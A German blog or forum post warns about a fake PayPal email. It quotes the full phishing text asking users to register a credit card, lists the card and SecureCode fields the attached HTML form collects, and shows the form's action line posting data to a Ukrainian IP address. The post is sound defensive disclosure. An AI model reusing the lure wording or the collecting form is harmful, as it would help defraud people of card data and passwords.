Ich habe unverhofft eine Email vom Paypal Support <
Support@Paypal.de >erhalten, in der ich aufgefordert wurde, meine Kreditkarte erneut zu registrieren. Da ich keine Kreditkarte besitze und solche Email ohnehin als verdächtig ansehe, habe ich bei PayPal angerufen.
Die Aussage der PayPal-Kundenservice-Mitarbeiterin war eindeutig. „Bei uns sind keinerlei Kreditkartendaten notwendig, Diese E-Mail und diese E-Mail-Adresse stammen NICHT von uns, trage sie keine Daten ein und löschen diese Mail“.
Inhalt der Mail:
Paypal - Bitte registrieren Sie Ihre Kreditkarte.
Sehr geehrter Kunde,
aufgrund eines automatisierten Abgleiches Ihrer Kundendaten mit Vergleichsstatistiken wurde das Risiko eines Zahlungsausfalls für Ihr Konto als überdurchschnittlich hoch eingestuft. Um weiterhin problemlos die Zahlungsmethode Bankeinzug nutzen zu können, bitten wir Sie eine Kreditkarte - als Sicherheit bei Zahlungsausfällen - bei uns zu registrieren. Diese wird Ihrem Account nicht als Zahlungsmethode hinzugefügt, sondern dient lediglich als Absicherung bei einem nicht ausreichend gedeckten Bankkonto. Sollten sie keine Kreditkarte bei uns hinterlegen, wird die Zahlungsmethode Bankeinzug für Ihr Konto deaktiviert. Ihre Kreditkartendaten können Sie mithilfe des beigefügten Formulars hinterlegen. Es ist dabei irrelevant ob Sie bereits eine Kreditkarte bei uns registriert haben, aus vertragsrechtlichen Gründen dürfen wir diese Kartendaten nicht als zusätzliche Sicherheit heranziehen. Sie können also eine Karte, welche bereits bei uns registriert ist, auch als Sicherheit hinterlegen. Wir bitten die Unannehmlichkeiten zu Entschuldigen, dieses Vorgehen ist allerdings aufgrund vermehrter Betrugsversuche durch ungedeckte Bankkonten erforderlich.
Hilfe-Center | Sicherheits-Center
Bitte antworten Sie nicht auf diese E-Mail. E-Mails an diese Adresse werden von uns nicht gelesen. Um mit einem Mitarbeiter unseres Kundenservice zu sprechen,loggen Sie sich in Ihr PayPal-Konto ein und klicken Sie unten auf "Kontakt".
Copyright © 2011 PayPal. Alle Rechte vorbehalten.
PayPal (Europe) S.à r.l.et Cie, S.C.A.
Société en Commandite par Actions
Sitz: 22-24 Boulevard Royal, L-2449 Luxemburg
RCS Luxemburg B 118 349
PayPal-E-Mail-ID PP1488
Im Anhang befindet sich die Datei „Registrierung.html“, in der folgende Daten eingetragen werden sollten.
Personenbezogene Daten:
-Vorname
-Nachname
-Straße und Hausnummer
-PLZ
-Ort
-Land
Kreditkarte:
-Abrechnungskontonummer
-Kreditkartennummer
-Kartenprüfnummer
(Die letzten drei Stellen auf der Rückseite Ihrer Karte. Bei American Express eine vierstellige Nummer auf der Vorderseite Ihrer Karte)
-Ablaufdatum
Um Ihnen in Zukunft noch mehr Sicherheit und Flexibilität beim Online Einkauf zu gewähren, bitten wir Sie, Ihr MasterCard® SecureCode© / Verified by Visa Passwort einzugeben.
JaNe is klar … Meinem letzten Kenntnisstand nach, sollte man dieses Passwort nie irgendwo eingeben. Sobald jemand das „MasterCard® SecureCode© / Verified by Visa Passwort“ kann das Konto vom Betrüger in Ruhe geplündert werden.
Denn …
Die eingeben Daten werden in der HTML-CodeZeile
<form class="safeSubmit multiplesubmitform" method="post" id="signup_form" name="signup_form" action="http://91.223.89.200/… (den 30igstelligen Hashcode habe ich entfernt) … /frage.php ">
nicht zu Paypal geschickt, sondern zu einem Ukrainischem PHP-Skript, was sicher die Daten in einer hübschen Datenbank einlagern möchte.
91.223.89.200 - Geo Information
IP Address 91.223.89.200
Host 91.223.89.200
Location UA, Ukraine
City -, - -
Organization ENERGOMONTAZH ltd.
ISP ENERGOMONTAZH ltd.
AS Number AS197572 ASNCITYNET CITYNET MARCIN SOBALA - PIOTR MISIUDA
Latitude 49°00'00" North
Longitude 32°00'00" East
Distance 971.25 km (603.51 miles)